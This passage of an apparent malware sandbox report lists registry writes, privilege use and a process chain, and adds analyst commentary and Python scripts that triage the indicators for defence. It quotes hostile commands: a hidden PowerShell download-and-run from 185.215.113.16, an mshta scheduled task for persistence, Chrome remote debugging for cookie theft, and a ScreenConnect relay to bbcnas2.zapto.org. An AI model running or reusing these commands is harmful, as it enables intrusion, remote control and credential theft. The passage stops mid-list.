| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002\F371D3396946D7F0354CFF6462B809A1 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\URL Protocol | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\UseOriginalUrlEncoding = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Version = "402915332" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsClient.exe\" \"%1\"" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\PackageCode = "F371D3396946D7F0354CFF6462B809A1" | C:\Windows\system32\msiexec.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = (blob data elided) | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = (blob data elided) | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (blob data elided) | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (blob data elided) | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = (blob data elided) | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |
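Two checks an analyst would make before reading the rows above as a malicious root install: the writes land in AuthRoot rather than Root, and both thumbprints match widely distributed public roots (5FB7EE06...C7DC25 is DigiCert High Assurance EV Root CA, D1EB23A4...D8E349 is the Comodo/Sectigo AAA Certificate Services root; verify against an exported trust store before relying on that). Windows' automatic root update caches such roots into AuthRoot from inside whichever process first validated a chain that needed them, so the sandbox attributes the write to the sample although the sample may only have made a TLS connection. An unknown thumbprint, or any write to Root, is the signal to escalate. The ScreenConnect rows in the "Modifies registry class" table above are the other persistent artefacts worth pulling out: a COM in-process server registration for a credential-provider DLL under Program Files, and a custom URL protocol scheme carrying the instance id. The Python below is an added example, not the sandbox's or any vendor's code: it parses rows in this report's table format and scores those three kinds of entry. The thumbprint table is an assumption to confirm, and the final sample row is constructed to show the escalation case.

```python
"""Triage registry rows from a sandbox report: certificate-store writes,
COM in-process server registrations and URL protocol handlers.

Added example for this page, not the sandbox vendor's code. The sample rows
are copied from the report (one extra row is constructed and marked so);
the thumbprint table below is an assumption to confirm against a trusted
root-store export before relying on it.
"""
import re
from dataclasses import dataclass

# Assumed SHA-1 thumbprints of widely distributed public roots. Windows'
# automatic root update writes such roots into AuthRoot from inside whatever
# process first validated a chain leading to them, so the sandbox attributes
# the write to the sample. Unknown thumbprints, or anything written to Root
# rather than AuthRoot, are what deserve attention.
KNOWN_PUBLIC_ROOTS = {
    "5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25": "DigiCert High Assurance EV Root CA",
    "D1EB23A46D17D68FD92564C2F1F1601764D8E349": "AAA Certificate Services (Comodo/Sectigo)",
}

# Table layout used by the report: | Description | Indicator | Process | Target |
ROW_RE = re.compile(r"^\|\s*(?P<op>[^|]+?)\s*\|\s*(?P<ind>.+?)\s*\|\s*(?P<proc>[^|]*?)\s*\|\s*[^|]*\|\s*$")
CERT_RE = re.compile(r"\\SystemCertificates\\(?P<store>[^\\]+)\\Certificates\\(?P<thumb>[0-9A-Fa-f]{40})")
INPROC_RE = re.compile(
    r"\\Classes\\CLSID\\(?P<clsid>\{[0-9A-Fa-f-]{36}\})\\InprocServer32\\\s*=\s*\"(?P<dll>.+)\""
)
URLPROTO_RE = re.compile(r"\\Classes\\(?P<scheme>[A-Za-z0-9.+-]+)\\URL Protocol")

# Sample rows copied from the report; the last one is constructed.
SAMPLE_ROWS = [
    r"| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = (blob data elided) | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |",
    r"| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |",
    r"| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |",
    r"| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe | N/A |",
    r'| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsCredentialProvider.dll" | C:\Windows\system32\msiexec.exe | N/A |',
    r"| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\URL Protocol | C:\Windows\system32\msiexec.exe | N/A |",
    # Constructed row, not from the report: an unknown thumbprint written to Root.
    r"| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\0000000000000000000000000000000000000000 | C:\Users\Admin\AppData\Local\Temp\evil.exe | N/A |",
]


@dataclass
class Finding:
    kind: str
    severity: str
    detail: str
    process: str


def parse_row(line):
    """Return (description, indicator, process) for a table row, else None."""
    m = ROW_RE.match(line.strip())
    return (m.group("op"), m.group("ind"), m.group("proc")) if m else None


def triage_registry_rows(rows):
    """Score certificate-store, COM InprocServer32 and URL-protocol rows; dedupe repeats."""
    findings, seen = [], set()
    for line in rows:
        parsed = parse_row(line)
        if not parsed:
            continue
        _op, ind, proc = parsed
        finding = None
        if (c := CERT_RE.search(ind)):
            store, thumb = c.group("store"), c.group("thumb").upper()
            name = KNOWN_PUBLIC_ROOTS.get(thumb)
            if store.lower() == "authroot" and name:
                finding = Finding("cert-store", "info", f"AuthRoot cache of public root {name} ({thumb})", proc)
            else:
                what = f"known root {name}" if name else "unknown thumbprint"
                finding = Finding("cert-store", "high", f"{store} store write of {what} {thumb}", proc)
        elif (i := INPROC_RE.search(ind)):
            dll = i.group("dll").replace("\\\\", "\\")  # the report doubles backslashes in values
            sev = "info" if dll.lower().startswith("c:\\windows\\") else "medium"
            finding = Finding("com-inproc", sev, f"{i.group('clsid')} -> {dll}", proc)
        elif (u := URLPROTO_RE.search(ind)):
            finding = Finding("url-protocol", "medium", f"custom scheme {u.group('scheme')}: registered", proc)
        if finding and (key := (finding.kind, finding.detail, finding.process)) not in seen:
            seen.add(key)
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in triage_registry_rows(SAMPLE_ROWS):
        print(f"[{f.severity:6}] {f.kind:13} {f.detail}  <- {f.process}")
```

Run against the full "Modifies system certificate store" table this downgrades every row to informational and leaves the credential-provider CLSID and the sc-3be09d9e5e840c20 scheme as the items to record for the host.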
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
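The Processes section that follows records the whole chain: am_no.bat generates random names with PowerShell, registers a scheduled task that runs mshta on an HTA every 25 minutes, the HTA has PowerShell fetch random.exe from 185.215.113.16 into %TEMP%, the loader drops further executables under numbered Temp directories, one of them starts Chrome with --remote-debugging-port (a DevTools session is a common way to read cookies without touching the encrypted on-disk database), another installs a ScreenConnect client whose relay host, port and instance id sit in plain text in its arguments, and a cmd.exe waits 11 seconds before deleting a working directory. The Python below is an added example, not the sandbox's or any vendor's code: it pairs the image and command-line entries in the format this report uses and pulls those indicators into structured findings. The sample list is copied from the report with the Chrome renderer and ScreenConnect arguments shortened; rule names and thresholds are the author's own.

```python
"""Triage the Processes section of a sandbox report and extract the
indicators a responder needs: the scheduled-task loader, the download URL,
the browser remote-debugging port, the ScreenConnect relay and the delayed
cleanup command.

Added example for this page; not the sandbox vendor's code. The sample
process list is copied from the report with a few long arguments shortened.
"""
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

# Constructed sample in the report's layout: image path line, then command line.
SAMPLE_PROCESSES = r'''
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\system32\schtasks.exe
schtasks /create /tn "Ot24UmakgHQ" /tr "mshta \"C:\Temp\BaWQvGOZI.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\system32\mshta.exe
mshta "C:\Temp\BaWQvGOZI.hta"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --remote-debugging-port=9223 --lang=en-US
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\noh47" & exit
C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=e228137a-1681-43c0-a833-6e8e39d6fe60&k=BgIAAACkAABSU0ExAAgAAAEAAQBd&c=test&c=&c=&c="
'''

SCHTASKS_RE = re.compile(r'/tn\s+"?(?P<tn>[^"\s]+)"?.*?/tr\s+"(?P<tr>.+?)"\s+/sc\s+(?P<sc>\w+)(?:\s+/mo\s+(?P<mo>\d+))?', re.IGNORECASE)
SCRIPT_HOST_RE = re.compile(r'(?:^|[\\"\s])(?P<host>mshta|powershell|pwsh|wscript|cscript|rundll32|regsvr32)(?:\.exe)?\b', re.IGNORECASE)
URL_RE = re.compile(r'''https?://[^\s'"()]+''', re.IGNORECASE)
DEBUG_PORT_RE = re.compile(r"--remote-debugging-port=(?P<port>\d+)")
SC_ARGS_RE = re.compile(r'"\?(?P<qs>[^"]+)"')          # the quoted "?e=...&h=...&p=..." argument
SC_INSTANCE_RE = re.compile(r"ScreenConnect Client \((?P<id>[0-9a-f]{16})\)", re.IGNORECASE)
CLEANUP_RE = re.compile(r'\brd\s+/s\s+/q\s+"?(?P<dir>[^"&]+?)"?\s*(?:&|$)', re.IGNORECASE)
DELAY_RE = re.compile(r"timeout\s+/t\s+(?P<s>\d+)", re.IGNORECASE)
TEMP_EXE_RE = re.compile(r"\\AppData\\Local\\Temp\\.+\.exe$", re.IGNORECASE)
DOWNLOAD_WORDS = ("downloadfile", "downloadstring", "invoke-webrequest", "start-bitstransfer", "iwr ")


@dataclass
class Finding:
    rule: str
    image: str
    iocs: dict


def pair_processes(text):
    """The report lists each process as an image-path line followed by its command line."""
    lines = [l for l in text.strip().splitlines() if l.strip()]
    return list(zip(lines[0::2], lines[1::2]))


def triage_processes(text):
    findings = []
    for image, cmd in pair_processes(text):
        low = cmd.lower()
        base = image.rsplit("\\", 1)[-1].lower()
        if TEMP_EXE_RE.search(image):
            findings.append(Finding("exe-from-user-temp", image, {"path": image}))
        if base == "schtasks.exe" and "/create" in low:
            m = SCHTASKS_RE.search(cmd)
            if m:
                action = m.group("tr").replace('\\"', '"')   # undo cmd-style quote escaping
                h = SCRIPT_HOST_RE.search(action)
                if h:
                    findings.append(Finding("task-runs-script-host", image, {
                        "task": m.group("tn"), "host": h.group("host").lower(), "action": action,
                        "schedule": f"{m.group('sc').lower()}/{m.group('mo') or '1'}"}))
        elif base == "powershell.exe" and any(w in low for w in DOWNLOAD_WORDS):
            findings.append(Finding("powershell-download", image, {"urls": URL_RE.findall(cmd)}))
        elif base == "chrome.exe" and "--type=" not in low:
            # Child processes inherit the flag; only the browser parent is reported.
            m = DEBUG_PORT_RE.search(cmd)
            if m:
                findings.append(Finding("browser-remote-debugging", image, {"port": int(m.group("port"))}))
        elif base == "screenconnect.clientservice.exe":
            m = SC_ARGS_RE.search(cmd)
            if m:
                q = parse_qs(m.group("qs"))
                inst = SC_INSTANCE_RE.search(image)
                findings.append(Finding("screenconnect-relay", image, {
                    "instance": inst.group("id").lower() if inst else None,
                    "relay_host": q.get("h", [None])[0],
                    "relay_port": int(q["p"][0]) if q.get("p") else None,
                    "session_type": q.get("e", [None])[0]}))
        elif base == "cmd.exe":
            m = CLEANUP_RE.search(cmd)
            if m:
                d = DELAY_RE.search(cmd)
                findings.append(Finding("delayed-cleanup", image, {
                    "dir": m.group("dir"), "delay_s": int(d.group("s")) if d else 0}))
    return findings


def extract_network_iocs(findings):
    """Hosts to block or hunt for, from download URLs and the ScreenConnect relay."""
    hosts = set()
    for f in findings:
        if f.rule == "powershell-download":
            hosts.update(urlsplit(u).hostname for u in f.iocs["urls"])
        elif f.rule == "screenconnect-relay" and f.iocs["relay_host"]:
            hosts.add(f"{f.iocs['relay_host']}:{f.iocs['relay_port']}")
    return sorted(hosts)


if __name__ == "__main__":
    found = triage_processes(SAMPLE_PROCESSES)
    for f in found:
        print(f"{f.rule:24} {f.iocs}")
    print("network IOCs:", extract_network_iocs(found))
```

The ScreenConnect argument string is worth parsing rather than eyeballing: h and p give the relay to block, s the session id, and the 16-hex instance id in the install path is what the service name, URL scheme and Program Files directory on a compromised host will all carry.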
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat" any_word
C:\Windows\system32\timeout.exe
timeout /t 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\system32\schtasks.exe
schtasks /create /tn "Ot24UmakgHQ" /tr "mshta \"C:\Temp\BaWQvGOZI.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\system32\mshta.exe
mshta "C:\Temp\BaWQvGOZI.hta"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
"C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"
C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
"C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 776 -s 504
C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe
"C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe"
C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe
"C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef72b9758,0x7fef72b9768,0x7fef72b9778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1100 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1496 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1588 --field-trial-handle=1360,i,7504942727961645950,15316791374823362059,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
